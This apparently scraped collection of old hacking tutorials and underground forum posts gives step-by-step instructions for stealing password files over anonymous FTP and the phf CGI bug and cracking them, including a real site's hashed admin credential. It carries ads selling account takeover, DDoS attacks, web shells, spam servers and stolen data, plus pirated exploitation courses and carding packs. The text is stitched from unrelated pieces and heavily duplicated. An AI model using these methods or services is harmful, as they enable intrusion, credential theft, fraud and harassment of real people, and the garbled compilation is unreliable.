"Chapter 4: Hacking WebpagesGetting the Password File Through FTPOk well one of the easiest ways of getting superuser access is throughanonymous ftp access into a webpage. First you need learn a little aboutthe password file...root:User:d7Bdg:1n2HG2:1127:20:SuperuserTomJones:p5Y(h0tiC:1229:20:Tom Jones:/usr/people/tomjones:/bin/cshBBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/cshThis is an example of a regular encrypted password file. The Superuser isthe part that gives you root. That^s the main part of the file.root:x:0:1:Superuser:/:ftp:x:202:102:Anonymous ftp:/u1/ftp:ftpadmin:x:203:102:ftp Administrator:/u1/ftpThis is another example of a password file only this one has one littledifference it^s shadowed. Shadowed password files don^t let you view orcopy the actual encrypted password.  This causes problems for the passwordcracker and dictionary maker(both explained later in the text). Below isanother example of a shadowed password file:root:x:0:1:0000-Admin(0000):/:/usr/bin/cshdaemon:x:1:1:0000-Admin(0000):/:bin:x:2:2:0000-Admin(0000):/usr/bin:sys:x:3:3:0000-Admin(0000):/:adm:x:4:4:0000-Admin(0000):/var/adm:lp:x:71:8:0000-lp(0000):/usr/spool/lp:smtp:x:0:0:mail daemon user:/:uucp:x:5:5:0000-uucp(0000):/usr/lib/uucp:nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucicolisten:x:37:4:Network Admin:/usr/net/nls:nobody:x:60001:60001:uid no body:/:noaccess:x:60002:60002:uid no access:/:webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/cshpin4geo:x:55:55:PinPaper Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/falseftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin/falseShadowed password files have an ""x"" in the place of a password or sometimesthey are disguised as an * as well.Now that you know a little more about what the actual password file lookslike you should be able to identify a normal encrypted pw from a shadowedpw file. We can now go on to talk about how to crack it.Cracking a password file isn^t as complicated as it would seem although thefiles vary from system to system. 1.The first step that you would take isto download or copy the file. 2. The second step is to find a passwordcracker and a dictionary maker. Although it^s nearly impossible to find agood cracker there are a few ok ones out there. I recomend that you lookfor Cracker Jack John the Ripper Brute Force Cracker or Jack the Ripper.Now for a dictionary maker or a dictionary file...  When you start acracking prog you will be asked to find the the password file. That^s wherea dictionary maker comes in. You can download one from nearly every hackerpage on the net.  A dictionary maker finds all the possible lettercombinations with the alphabet that you choose(ASCII caps lowercase andnumeric letters may also be added) .  We will be releasing our pasword fileto the public soon it will be called Psychotic Candy ""The Perfect Drug.""As far as we know it will be one of the largest in circulation. 3. You then start up the cracker and follow the directions that it givesyou.The PHF TechniqueWell I wasn^t sure if I should include this section due to the fact thateverybody already knows it and most servers have already found out aboutthe bug and fixed it. But since I have been asked questions about the phfI decided to include it.The phf technique is by far the easiest way of getting a password file(although it doesn^t work 95% of the time). But to do the phf all you dois open a browser and type in the following link:http://webpage_goes_here/cgi-bin/phf?Qa ... etc/passwd You replace the webpage_goes_here with the domain. So if you were trying toget the pw file for  you would type:?Qali ... etc/passwdand that^s it You just sit back and copy the file(if it works).The best way to get root is with an exploit. Exploits are explained in thenext chapter."
"Introduction - OK this file is intended solely for people who know very little about hacking and when I say very little I mean very little.  Now for those of you jumping happily around and screaming ""Finally I am gonna be a hacker? stop jumping around and just sit down take a few deep breaths and just relax.  After reading this file you should be able to hack1 - A WWWBOARD2 - FTP/UNIX sites3 - Website Tricks and4 - Neat stuff/Misc. with much confidence.Now on to the disclaimer:*** I will NOT be held responsible for what you do with this information. ***NOTE:  All commands that are written in this file with the exception of the John the Ripper commands like ""edit passwd"" are for DOS so if you have UNIX use the VI editor or something of the sort.OK now there is no specific table of contents of this file I am pretty much just going to make it up as I go along.  Now for you advanced hackers out there I would recommend just leaving this file because you probably won^t find much in this file that you don^t already know.  All right now that I^m done this stupid raving rant I can start explaining how to go about learning what you want to learn.1 - How to hack a WWWBOARD (Credit going to kM of  for coming up with this brilliant idea lets all applaud kM.)OK now obviously in order to hack a WWWBOARD you need some sort of password file.  Now defaultly the passwd file is in the WWWBOARD directory.  Most people who run the WWBOARD think to themselves ""Hmm... What are the odds of some guy coming along and wanting to hack my WWWBOARD?""  Well the odds are pretty damn good.  Now when I say hack I mean both just to explore and just to do fun stuff like deleting files.  I am not saying deleting files is GOOD but sometimes it is fun.  Anyway the passwd file is almost always in the WWWBOARD directory so lets take a real WWWBOARD.The URL is http://www.cobleskill.edu/projects/archeo/wwwboard/.  Now if you go to that URL you will see a listing of files.  For the purpose of this file ONLY and not malicious intent I have not alerted the site of this problem.  Now go to that URL and click on the file passwd.txt.  You will get two words that look like this:WebAdmin:aepTOqxOi4i8UThe first word WebAdmin is the username of obviously the operator of this WWWBOARD.  The second ""word"" is the password now your probably sitting there looking at that word thinking to yourself ""God damn that is one funky password"" Well stop thinking that because yes that is the password but it is encrypted.  So you have to get a password cracker.  Now I recommend one of two Password Crackers either CrackerJack or John the Ripper both of these can be found at  or almost any other hacking site.  Once you go and get a password cracker you will most likely need a Word File.  Those to can be found at .  Once you get the necessary stuff you will need to copy the password file WebAdmin:aepTOqxOi4i8U and paste it into an empty notepad file or something of the sort.  Now you are probably thinking to yourself again ""Alright now I can crack this bad-ass of a password and become a hacker""  Sorry to rain on your parade but no.  Yes you might be able to crack the password but then ask yourself one question once I got the password what do I do with it??  Do I go mail it to the server www.cobleskill.edu and say ""Hey I got your passwd now give me complete access to your WWWBOARD"" Sorry if you do that you will be thinking for about 10 years in prison ""What did I do wrong?"" or you might become Bruno^s sweet boy.  Sound like fun??  Didn^t think so.  OK now IF you crack the password file and you get the Username and Password unencrypted of course paste it into a text document or something then add this right onto it - "":-2:-2:anonymous NFS user:/:/bin/date""  What that will do will turn the WWWBOARD passwd file into a UNIX passwd file.  If you don^t do that then you will never crack the file.  All in all the passwd file should look like this: ""WebAdmin:aepTOqxOi4i8U:-2:-2:anonymous NFS user:/:/bin/date""  Now I don^t use CrackerJack so if you got that I can^t help you but if you got John the Ripper then type in this command in DOS : ""john -pwfile:xxxxx -wordfile:xxxxx""  XXXXX is whatever you named the passwd file or the word file.  For example ""john -pwfile:hehe.txt -wordfile:WF.txt""  It should just screw around for awhile and compute stuff and then if it is cracked you will get on the left side of the screen the passwd WebBoard and the Username WebAdmin.  Now WebAdmin and WebBoard are the two-default username and passwds.  Shows you about security these days.  Now once you got those two things go into the WWWBOARD directory and look for a file(s) called WWWADMIN.CGI or WWWADMIN.PL or WWWBOARD.CGI or even WWWBOARD.PL.  If none of those are there then you should examine the rest of the files in the directory.  When I was in the directory the file wasn^t there but I found it nevertheless I am not going to tell you what it is but once you find it you will get something like this:WWWAdmin For WWWBoardChoose your Method of modifying WWWBoard Below:     Remove Files           Remove Files           Remove Files by Message Number           Remove Files by Date           Remove Files by Author      Password           Change Admin PasswordThat is you guessed it the little ""Operating Station"" for the WWWBOARD.  Now to do any of those things you must have the Username and Passwd that you cracked.  So click on an option and I think the rest is pretty much self-explanatory.  I really do not recommend trashing the WWWBOARD some people depend on them to get a lot of questions and answers etc.  I usually just read all the hidden messages and stuff like that and then just leave or tell the Operator of the WWWBOARD that his board is 100% trashable. 2 - Hacking an FTP siteOK now hacking an FTP site WAS pretty easy a while ago but nowadays most passwd files are shadowed which adds a little bit of extra security.  I^ll explain it later.  OK now just before we start the passwd file on UNIX machines is ""passwd"" not ""passwd.txt.""  OK now for the example site we are going to use .  Now with the information I am going to give you will not let you hack this site because the passwd file is shadowed as is almost every single website but nevertheless if you ""experience"" hacking long enough you will find the answer on how to get the file.  OK now the first step is to do 1 of 2 things get an FTP browser like CuteFTP or BulletFTP or something or you can use Win95 FTP which no one really knows about and how I found out is beyond my memory.  OK I will explain the FTP browser way first.  OK fire up the FTP Browser and for the host name plug in  and for the port leave it at whatever it is and hit connect if there are any other options then just screw around with them for a while and you^ll figure it out.  Anyway for the access type or whatever click on Anonymous and after you hit connect you^ll get some directories in the Remote Host box and some other neat stuff in Local Host.  Now in the Remote Host section you want to double click on the ""etc"" directory if it is visible if it is not then see in the pull-down menus if there is an option called custom command.  If there is then click on it and for the command type in ""cd etc"" and it will either say ""OK CWD command accepted"" or something along the lines of that or it will say ""..:Access Denied"" or even ""Error:There is no file or directory by that name.""  If you get the CWD command accepted then were in business.  In the /etc/ directory you should see a file called passwd. If you don??t then go back up to custom command an for the command type in ""get /etc/passwd"" and it will either say ""OK Port command successful"" or it will say ""..:Access Denied.""  If you see that file then you can just drag the file over to local host and then click on the button ""Start Download"" or ""Start Query"" or something like that.Now if you have Win95 FTP you will have to go the Start Menu MS-DOS Prompt and type in ""FTP WWW.FREESTUFF.COM"" and it will show up a bunch of neat little messages like ""connecting to "" and other stuff.  Eventually you will get to the login screen where it will say ""(USER)"" or something interesting and long like that.  Now for User type in Anonymous.  If it accepts it will say ""Password"" or it will say ""Anonymous access not allowed on this server."" Now obviously the FBI or CIA is not going to allow ftp access so don^t even try it.  Now if you get to the password part just type in something interesting like ""Suckhole@"" and the ftp server will fill in the rest.  You can make it anything you want now you^ll either get 1 of 2 messages within a marginal error ""Cannot set guest privileges"" or this ""Anonymous access allowed guest privileges set.""  Those should be the only two that you get.  If there are any others these messages are pretty much self explanatory.  Now when you log on the first thing you want to type is this command ""pwd.""  Just that it will display the current directory that you are in.  You want it to say ""/.""  If it doesn^t then type this command about 3 times ""cd ..""  That will take you down 1 directory/subdirectory.  Once you get to the ""/"" directory type this command ""ls -a.""  It will list all the files in the directory including the hidden ones.  Now if you see something in the listing that says ""etc"" then type this command ""cd etc.""  That will move you into the ""etc"" directory.  Just to be sure type in ""pwd"" again to make sure you??re in the ""etc"" directory.  If you are then good and type ""ls -a"" again and you should get some of these files: ""Pwd.db passwd group netconfig net.config or maybe even master.passwd.""  The two files we are most interested in are ""passwd"" and ""master.passwd.""  I think what the files hold are kind of self-explanatory but I^ll tell you anyway the ""passwd"" file holds all the usernames and passwd^s that are on the entire system that your rooting around on.  The ""master.passwd"" file will only show up if the passwd file is shadowed and it also means the SysAdmin is a complete brain puppy.  Forget ""master.passwd"" for now.  The command you want to issue to this system is to get the ""passwd"" file from their computer to your computer and we do that by simply typing ""get passwd.""  It should barf up some neat stuff and then start transferring the file.  When you get back to the ftp prompt you will have the passwd file on your C:\ drive or wherever you initiated the ""ftp "" from.  Now you just want to type in ""quit.""  That will log you off the server.  Now for some reason right when you logoff the server you want to log back on just hit the ""F3"" key and it will pop up your last command.  Now what you want to do is move the passwd file to wherever your passwd cracker is.  You can do that by typing ""move passwd X:\XX.""  X is the drive that your passwd cracker is on and XX is the directory the passwd cracker is in.  Then it should say something like this: passwd -------> X:\XX -->OK"" or something like that.  Once you have moved the passwd file go the passwd crackers directory and open up the file by typing ""Edit passwd.""  If the file has a bunch of stuff that looks like this:root:x:x:x:x:x:x:daemon:x:x:x:x:x:xIf it looks like that not all the x^s just one by the usernames then the passwd file is shadowed and can??t be cracked might as well delete it (More info on shadowed passwd^s at the bottom of this file).  If it isn^t shadow then just type in the passwd cracking command and get ready to hack a server  I still highly recommend not doing any damage there are many ways to get caught and just to help out the websites out there I will not tell you the ways that they can catch you But don^t worry every 8 out of 10 servers that are aware of having an attempted hack don^t report it and just go about there business.  Now one more thing if you get on the server with root access (basically root means that you can do anything you are God on this system) then there are log files that record what happens to you now I think I am handing you more than enough information so I am going to let you found out how to wipe your presence from the system there are plenty of .txt files out there that tell you how to do it.3 - Website TricksOK now these Website tricks are ""tricks"" to get the passwd file without using FTP Browser or FTP Browsers.The PHF TrickOK now this phf trick is a bit tricky (hehehe) not to use but in the fact that some sites have added a command in there HTML code that if the phf command is issued then it will display a message like ""Smile your on candid camera"" or it will say this ""Your hack attempt has been logged and sent to the proper authorities.""  Sit the hell down drop that shotgun unbar your door and stop whimpering about how your going to get busted and raped in prison by Scruffy.  90% of the time they are just bullshitting you and to them the proper authorities could be out in deep-dish-yak-dick country or in Bum Fuck Egypt.  They just do that to scare the living shit out of Newbies or anybody who does that.  It is bullshit so stop worrying.  OK now on how to do the phf trick.  This trick practically never works anymore but hey its fun to try on old school sites and stuff like that.  I don^t have an example site cause I really don^t want to hunt down a site that this trick works on so go find on yourself and don^t send me e-mail about how you can^t find a site that this doesn^t work on.  In order to do this trick the site must have a /cgi-bin/ directory.  If it doesn^t then just leave it and forget the whole damn thing on that site but if it does then keep reading.  I am going to make this quick an example would be this: ? ... etc/passwd"
Lockphish it^s the first tool (05/13/2020) for phishing attacks on the lock screen designed to grab Windows credentials Android PIN and iPhone Passcode using a https link. DarkFox said:    Lockphish it^s the first tool (05/13/2020) for phishing attacks on the lock screen designed to grab Windows credentials Android PIN and iPhone Passcode using a https link.  Click to expand...  Tell me more about it pls DarkFox said:    Lockphish it^s the first tool (05/13/2020) for phishing attacks on the lock screen designed to grab Windows credentials Android PIN and iPhone Passcode using a https link.  Click to expand...  Thanks DarkFox[B]thanks Is it a original repository -? Does anyone use it lately? If yes how it works now?[/B] Lockphish it^s the first tool (05/13/2020) for phishing attacks on the lock screen designed to grab Windows credentials Android PIN and iPhone Passcode using a https link.   tell me more about this
Spartan Hacking Services We can do everything without limits??  Spartan Team is a collection of some of the greatest hackers that have operated on the deepweb.  We offer a wide range of services and will undertake any job that is within the realm of possibility.  We are only bound by our own ethics which includes finishing any job we started we dont quit a job halfway. We aim to make all kind online protections for our valuable clients.   Password Hacking Paypal Hacking Computer Hacking Facebook Hacking Email Hacking Website Hacking Cell Phone Hacking WhatsAPP Hacking Twitter Hacking iPhone Hacking Instagram Hacking Android Hacking Snapchat Hacking Windows Phone Hacking Telegram Hacking Messenger Hacking Encrypted Chat Hacking Gmail(youtube) Hacking  Recover stolen bitcoins from scammers Extracting the user/email/?? list from the website Bachelor Degree (almost any University) Change grades in schools and universities. Clean your criminal records DDOS attack Hack and control personal as well as corporate computers Negative link removal from google Database hacking Skype hacking Password recovery. If you have a website we can diagnose for vulnerabilities  ??and much more  You can contact us by e-mail spartans@keemail.me  We will try to answer as quickly as possiblewrite at any time we are online 24 hours a day  When you contact us ?? explain the desired service as closely as possible to get rid of confusion.  We perform work of any complexity  prices may vary depending on the complexity of the work.  The range of services may also vary  we can not list all of our services so feel free to ask for other services     TESTED TRUSTED 10+
Please update link bro thanks Can i get new link? No availlable to download please update links Option 1: ...CK...UALITY_rar   Option 2: Gofile  Option 3: https://mega.nz/file...Qizq_hhQVlw7QWY thank u so good nice thanks bro
i want to have a Telegram account reported  so that their channel stops Can you really hack any instagram/telegram account? What about  social accounts? I think it will be interested for many people Through special malware vulnerabilityremote access trojan  SS7 method and social engineering we are able to obtain any account password           Types:  Reset Password ?? Using our exploits we will reset the password and create a new one for you  Full Details ?? You will receive the actual user email and password account password and cookies to log in every time on the account. This is the only way without the person to know his account is hacked  The prices are not for Verified Blue Badge accounts  Contact Us: Telegram - @torverfied Email - sechacker@    Reset PasswordFull DetailsTwitterNot 2FA = 120$ 2FA = 150$Not 2FA = 160$ 2FA = 190$FacebookNot 2FA = 110$ 2FA = 140$Not 2FA = 150$ 2FA = 180$InstagramNot 2FA = 130$ 2FA = 160$Not 2FA = 170$ 2FA = 200$  Instagram Hacking good luck with your sales bro Patron said:    good luck with your sales bro  Click to expand...  Thanks patron God bless you how much to hack a snapchat account? hhhh said:    how much to hack a snapchat account?  Click to expand...  180$ reset password with ss7 protocol 220$ get password via rat method I have contacted you by email and sent you BTC 12 hours ago - no response after that Holaa quiero hackear un Facebook Hello I want you to report a telegram account to me can anyone hack a email address password and send immoral content to the person^s family and friends with it? How much to hack  account? Thanks) sleepytime said:    I have contacted you by email and sent you BTC 12 hours ago - no response after that  Click to expand...  did you ever get a repsonse or this scam
hidden account251 said:    can you teach me about hacking basics?I wanna learn how to DDoS  Click to expand...  if you can sugguest some really good DDoS tools that would be great Hello I want you to report a telegram account to me DDOS Attack Our botnet consists in over 700.000 pcs and mobile phones which can take down almost any website. For Cloudflare or Sucuri protected websites the minimum plan is 1 day. Telegram - @torverfied Email - sechacker@  To check if website is protected by Cloudflare or Sucuri: Visit  and enter the site url Check for Name Servers ?? if you see the name cloudflare or sucuri it means site is protected.  SYN-flood UDP-flood NTP-amplification Multi-vector amplification (several amplification scenarios simultaneously). You can choose how long the attack will last.  06H = $ 250 12H = $ 450 18H = $ 650  24H = $ 850  Take Google Ads Down Take down your competitors today from Google Ads. Our custom made script will click on your competitor ad until the budget is exhausted and the Ad is down.  05?D = $ 175 10D = $ 300 15D = $ 400 20D = $ 520  PHP Mailer You buy 10x the product Php Mailers with GUI (easy to use interface) Link to php file already uploaded to a website and hosted on a Linux Root server  Price = $ 110  C99 PHP WSO Shell You are purchasing 10 PHP Shells The php source file is uploaded/hosted on a Linux Root With this tool you can upload and host freely your files  Price = $ 110  Email leads  Each email list has 150.000 emails extracted from shops databases with advanced hacking tools. Lists updated 30 January 2020.  Depending on the country between $ 80 and $ 100  IP Inbox SMTP  10 IP SMTPs for sale every SMTP you buy is a spam tool that sends inbox to all.  Inbox to all Smtps are verified before delivery with our smtp test tool/smtp checker.  Price = $ 90  Domain Inbox SMTP  10 Domain SMTPs for spamming each purchased SMTP server can deliver inbox to all.  Inbox to all Smtps are verified before delivery with our smtp checker/smtp test tool.  Price = $ 90  SMS List  Each SMS list has 150.000 phone numbers  All the mobile numbers contained in each of the package we provide are active.  A bulletproof server allows you to perform any tasks from DDOS attacks to Mass Email sending. Price per month. Deploys within 10-15 minutes after payment is made  Depending on the country between $ 85 and $ 120  Bulletproof Linux And Windows Servers  A bulletproof server allows you to perform any tasks from DDOS attacks to Mass Email sending. Price per month. Deploys within 5 minutes after payment is made. The operating system version is chosen by the customer hello bro i need send sms or smtp inbox can you teach me about hacking basics?I wanna learn how to DDoS
Hello I want you to report a telegram account to me card received in hand and everyone go like a charm thanks bro for the cash.also gmail hack was perfect all good pro Wait.. ignoring the TG & WAPP accounts could this service be used to receive & send text messages from a mobile number so the victim does not get the texts/ calls? in essence to take control of a number i want to have a Telegram account reported  so that their channel stops Hack Telegram Whatsapp Accounts  We provide the cheapest and most reliable Telegram Whatsapp  hacking service on the deep web.  Telegram - @torverfied Email - sechacker@  How does it work?  Redirect all SMS and Calls to our control panel. Easily access the victim Telegram. 100% Guaranteed. Available for all mobile phones and networks.  Price  For 1 Device only. Time to setup: 12-24hours  Telegram : 110$ Whatsapp : 100$ Urgent (4 Hours) : +50$  Please Deposit the amount through escrow service and send me your email and the name or url link of the Telegram or Whatsapp messenger you want to hack and wait for the email. We will send your account login information within 24-48 hours.  100% money back guarantee.  FAQ   How do I get bitcoins?  You can buy them at : Fastest and easiest way to buy and sell bitcoins - LocalBitcoins   Why are you not replying to my email?  If we don^t get a profile link and proof of Bitcoin payment we will not reply to prevent being traced.   I sent you the money why haven^t you replied within 48 hours?  Make sure you sent the bitcoins to the correct address and ensure that the email is correct. Send us an email reminder we have a lot of accounts to hack so we might have missed your email.   How can I trust you that this is not a scam?  Short answer you cant. Long answer there is a lot of hackers for hire all over the deep web that is a fact. But like with any deep web service or product sometimes you just gotta take risks.   Telegram Hacking Hey  Can you access a telephone numbers previous whats apps chats with another number? damnnnnnnnn
Thanks Today I^m Sharing a Paid Course. 1500 USD. OffensiveSecurity ?? Advanced Web Attacks and Exploitation . Import before they wipe. I updated the post because that file in MEGA has password that i can^t remember. But the good news the course is being shared in torrent so enjoy....     magnet:?xt=urn:btih:b0cf48ffc23c9c6065b3f3f35146302bd4d3b03a&dn=Offensive-Security-Advanced-Web-Attacks-and-Exploitation-AWAE&tr=http://retracker.telecom.by:80/announce&tr=udp://9.rarbg.to:2710/announce&tr=udp://:2710/announce&tr=udp://coppersurfer.tk:6969/announce&tr=udp://eddie4.nl:6969/announce&tr=udp://:6969/announce&tr=udp://:6969/announce&tr=udp://open.stealth.si:80/announce&tr=udp://:6969/announce&tr=udp://retracker.lanta-net.ru:2710/announce&tr=udp://:80/announce&tr=udp://torr.ws:2710/announce&tr=udp://tracker.coppersurfer.tk:6969/announce&tr=udp://tracker.cypherpunks.ru:6969/announce&tr=udp://:1337/announce&tr=udp://:6969&tr=udp://:6969/announce&tr=udp://tracker.open-internet.nl:6969/announce&tr=udp://:1337/announce&tr=udp://:6969/announce&tr=udp://:451/announce&tr=udp://tracker.uw0.xyz:6969/announce&tr=udp://tracker.vanitycore.co:6969/announce   Cheeers neato Thank you so much Thanks
wonderful Thanks? i want to have a Telegram account reported  so that their channel stops nonamexxx said:    Im new here but feel like at home with all of yee.  Click to expand...  Noce CONTENTS:  1.Netflix cracking (full tutorials+tools) 2.Amazon prime video method 3.Deezer method 4.Eros now subscription method Instagram panel trick 6.Steam cracking tool 7.VIU+VOOT trick with download 8.PUBG UC pass trick 9.Carding PDFs for noobs 10.AMEX accessing PDF 11.CC cashout 12.ATM hack 13.Instagram account hack WhatsApp admin hack 15 .Netflix Cracker Free 1 Month Netflix Trick ( You Can Create Unlimited Account ) 17.Free Netflix using PayPal ( Video Tutorial ) 18.Free Amazon Prime Trick + Video Tutorial 19.Hotstar Cracking Trick (Video Tutorial) 20.How To Bypass Link Shortner 21.Instagram Liker 22.Snow??s YouTube Bot 23.YouTube View Booster Bot 24.YouTube Blazzer 50 Android Hacks 26.Amazon Gift Cards 27.Paypal Method 28.Ebay Method 29.Free Amazon Gift Card Method 30.Free Pizza Method 31.Flipkart Carding Tutorial 32.How To Get Fresh Valid Proxy List For Cracking 33.How To Get A Free Master Card 34.How To Get Referrals 35.Bypass Gmail Mobile Verification Trick 36.Bypass Android Pattern Lock Using ADB 37.Get Refund Of GiftCard 38.Facebook Hacking Ebook 39.Get Things From Ebay For Free 40.SEO Secrets 41.Guide To Make Money Online Hack Hotmail 43.Hack Gmail 44.Hacking Methods 45.CC Generator 46.CC Checker 47.Crack WEP in Linux 48.Get Massive YouTube Traffic 49.Get Passes To Pornsites 50.Hack WEP WiFi Password 51.Kick Someone Of A Wireless Network 52.Make $1000??s A Week With Torrents 53.Make A Phisher For A Website (Facebook/Instragram/Etc) 54.Make Easy Money As An eBay Affiliate 55.Make Multiple Gmail Accounts With Only 1 Account 56.How To Make Mozilla 30 Times Faster 57.USA Whatsapp Number Trick 58.Collection Of Rare Hacking Ebooks 59.Starbucks Method 60.How To Call Someone From His Own Number (Caller Id Spoofing) 61.Transfer PP Balance Method 62.YouTube RED Trick 63.Gaana Mod App 64.Netflix Mod App (Look a Like) Saavn Mod App Express VPN Mod App 67.7 Reasons a Credit Card Is Blocked Amazon Carding Method + Video Tutorial 69.What is Carding?? (Video) 70.Basic Carding TutoBal 71.Phishing Tutorial 72.Easy Cardable Sites List 73.Find Local BIN??s Carding For Noobs 75.Carding Online Tools And Website 76.PayPal Carding 77.Wallmart Carding 78.Amazon Carding (Video Tutorial) eBay Carding (Video Tutorial) 80.Full process of Carding            Master Hack Pack   MediaFire is a simple to use free service that lets you put all your photos documents music and video in a single place so you can access them anywhere and share them everywhere.     ??????????27?? said:    CONTENTS:  1.Netflix cracking (full tutorials+tools) 2.Amazon prime video method 3.Deezer method 4.Eros now subscription method Instagram panel trick 6.Steam cracking tool 7.VIU+VOOT trick with download 8.PUBG UC pass trick 9.Carding PDFs for noobs 10.AMEX accessing PDF 11.CC cashout 12.ATM hack 13.Instagram account hack WhatsApp admin hack 15 .Netflix Cracker Free 1 Month Netflix Trick ( You Can Create Unlimited Account ) 17.Free Netflix using PayPal ( Video Tutorial ) 18.Free Amazon Prime Trick + Video Tutorial 19.Hotstar Cracking Trick (Video Tutorial) 20.How To Bypass Link Shortner 21.Instagram Liker 22.Snow??s YouTube Bot 23.YouTube View Booster Bot 24.YouTube Blazzer 50 Android Hacks 26.Amazon Gift Cards 27.Paypal Method 28.Ebay Method 29.Free Amazon Gift Card Method 30.Free Pizza Method 31.Flipkart Carding Tutorial 32.How To Get Fresh Valid Proxy List For Cracking 33.How To Get A Free Master Card 34.How To Get Referrals 35.Bypass Gmail Mobile Verification Trick 36.Bypass Android Pattern Lock Using ADB 37.Get Refund Of GiftCard 38.Facebook Hacking Ebook 39.Get Things From Ebay For Free 40.SEO Secrets 41.Guide To Make Money Online Hack Hotmail 43.Hack Gmail 44.Hacking Methods 45.CC Generator 46.CC Checker 47.Crack WEP in Linux 48.Get Massive YouTube Traffic 49.Get Passes To Pornsites 50.Hack WEP WiFi Password 51.Kick Someone Of A Wireless Network 52.Make $1000??s A Week With Torrents 53.Make A Phisher For A Website (Facebook/Instragram/Etc) 54.Make Easy Money As An eBay Affiliate 55.Make Multiple Gmail Accounts With Only 1 Account 56.How To Make Mozilla 30 Times Faster 57.USA Whatsapp Number Trick 58.Collection Of Rare Hacking Ebooks 59.Starbucks Method 60.How To Call Someone From His Own Number (Caller Id Spoofing) 61.Transfer PP Balance Method 62.YouTube RED Trick 63.Gaana Mod App 64.Netflix Mod App (Look a Like) Saavn Mod App Express VPN Mod App 67.7 Reasons a Credit Card Is Blocked Amazon Carding Method + Video Tutorial 69.What is Carding?? (Video) 70.Basic Carding TutoBal 71.Phishing Tutorial 72.Easy Cardable Sites List 73.Find Local BIN??s Carding For Noobs 75.Carding Online Tools And Website 76.PayPal Carding 77.Wallmart Carding 78.Amazon Carding (Video Tutorial) eBay Carding (Video Tutorial) 80.Full process of Carding  [Hidden content]  Click to expand...  Thank you ??????????27?? said:    CONTENTS:  1.Netflix cracking (full tutorials+tools) 2.Amazon prime video method 3.Deezer method 4.Eros now subscription method Instagram panel trick 6.Steam cracking tool 7.VIU+VOOT trick with download 8.PUBG UC pass trick 9.Carding PDFs for noobs 10.AMEX accessing PDF 11.CC cashout 12.ATM hack 13.Instagram account hack WhatsApp admin hack 15 .Netflix Cracker Free 1 Month Netflix Trick ( You Can Create Unlimited Account ) 17.Free Netflix using PayPal ( Video Tutorial ) 18.Free Amazon Prime Trick + Video Tutorial 19.Hotstar Cracking Trick (Video Tutorial) 20.How To Bypass Link Shortner 21.Instagram Liker 22.Snow??s YouTube Bot 23.YouTube View Booster Bot 24.YouTube Blazzer 50 Android Hacks 26.Amazon Gift Cards 27.Paypal Method 28.Ebay Method 29.Free Amazon Gift Card Method 30.Free Pizza Method 31.Flipkart Carding Tutorial 32.How To Get Fresh Valid Proxy List For Cracking 33.How To Get A Free Master Card 34.How To Get Referrals 35.Bypass Gmail Mobile Verification Trick 36.Bypass Android Pattern Lock Using ADB 37.Get Refund Of GiftCard 38.Facebook Hacking Ebook 39.Get Things From Ebay For Free 40.SEO Secrets 41.Guide To Make Money Online Hack Hotmail 43.Hack Gmail 44.Hacking Methods 45.CC Generator 46.CC Checker 47.Crack WEP in Linux 48.Get Massive YouTube Traffic 49.Get Passes To Pornsites 50.Hack WEP WiFi Password 51.Kick Someone Of A Wireless Network 52.Make $1000??s A Week With Torrents 53.Make A Phisher For A Website (Facebook/Instragram/Etc) 54.Make Easy Money As An eBay Affiliate 55.Make Multiple Gmail Accounts With Only 1 Account 56.How To Make Mozilla 30 Times Faster 57.USA Whatsapp Number Trick 58.Collection Of Rare Hacking Ebooks 59.Starbucks Method 60.How To Call Someone From His Own Number (Caller Id Spoofing) 61.Transfer PP Balance Method 62.YouTube RED Trick 63.Gaana Mod App 64.Netflix Mod App (Look a Like) Saavn Mod App Express VPN Mod App 67.7 Reasons a Credit Card Is Blocked Amazon Carding Method + Video Tutorial 69.What is Carding?? (Video) 70.Basic Carding TutoBal 71.Phishing Tutorial 72.Easy Cardable Sites List 73.Find Local BIN??s Carding For Noobs 75.Carding Online Tools And Website 76.PayPal Carding 77.Wallmart Carding 78.Amazon Carding (Video Tutorial) eBay Carding (Video Tutorial) 80.Full process of Carding  [Hidden content]  Click to expand...  OMG THANK YOU Nice   ansko69 said:    OMG THANK YOU   Click to expand... You are the best thanks thanks ??????????27?? said:    CONTENTS:  1.Netflix cracking (full tutorials+tools) 2.Amazon prime video method 3.Deezer method 4.Eros now subscription method Instagram panel trick 6.Steam cracking tool 7.VIU+VOOT trick with download 8.PUBG UC pass trick 9.Carding PDFs for noobs 10.AMEX accessing PDF 11.CC cashout 12.ATM hack 13.Instagram account hack WhatsApp admin hack 15 .Netflix Cracker Free 1 Month Netflix Trick ( You Can Create Unlimited Account ) 17.Free Netflix using PayPal ( Video Tutorial ) 18.Free Amazon Prime Trick + Video Tutorial 19.Hotstar Cracking Trick (Video Tutorial) 20.How To Bypass Link Shortner 21.Instagram Liker 22.Snow??s YouTube Bot 23.YouTube View Booster Bot 24.YouTube Blazzer 50 Android Hacks 26.Amazon Gift Cards 27.Paypal Method 28.Ebay Method 29.Free Amazon Gift Card Method 30.Free Pizza Method 31.Flipkart Carding Tutorial 32.How To Get Fresh Valid Proxy List For Cracking 33.How To Get A Free Master Card 34.How To Get Referrals 35.Bypass Gmail Mobile Verification Trick 36.Bypass Android Pattern Lock Using ADB 37.Get Refund Of GiftCard 38.Facebook Hacking Ebook 39.Get Things From Ebay For Free 40.SEO Secrets 41.Guide To Make Money Online Hack Hotmail 43.Hack Gmail 44.Hacking Methods 45.CC Generator 46.CC Checker 47.Crack WEP in Linux 48.Get Massive YouTube Traffic 49.Get Passes To Pornsites 50.Hack WEP WiFi Password 51.Kick Someone Of A Wireless Network 52.Make $1000??s A Week With Torrents 53.Make A Phisher For A Website (Facebook/Instragram/Etc) 54.Make Easy Money As An eBay Affiliate 55.Make Multiple Gmail Accounts With Only 1 Account 56.How To Make Mozilla 30 Times Faster 57.USA Whatsapp Number Trick 58.Collection Of Rare Hacking Ebooks 59.Starbucks Method 60.How To Call Someone From His Own Number (Caller Id Spoofing) 61.Transfer PP Balance Method 62.YouTube RED Trick 63.Gaana Mod App 64.Netflix Mod App (Look a Like) Saavn Mod App Express VPN Mod App 67.7 Reasons a Credit Card Is Blocked Amazon Carding Method + Video Tutorial 69.What is Carding?? (Video) 70.Basic Carding TutoBal 71.Phishing Tutorial 72.Easy Cardable Sites List 73.Find Local 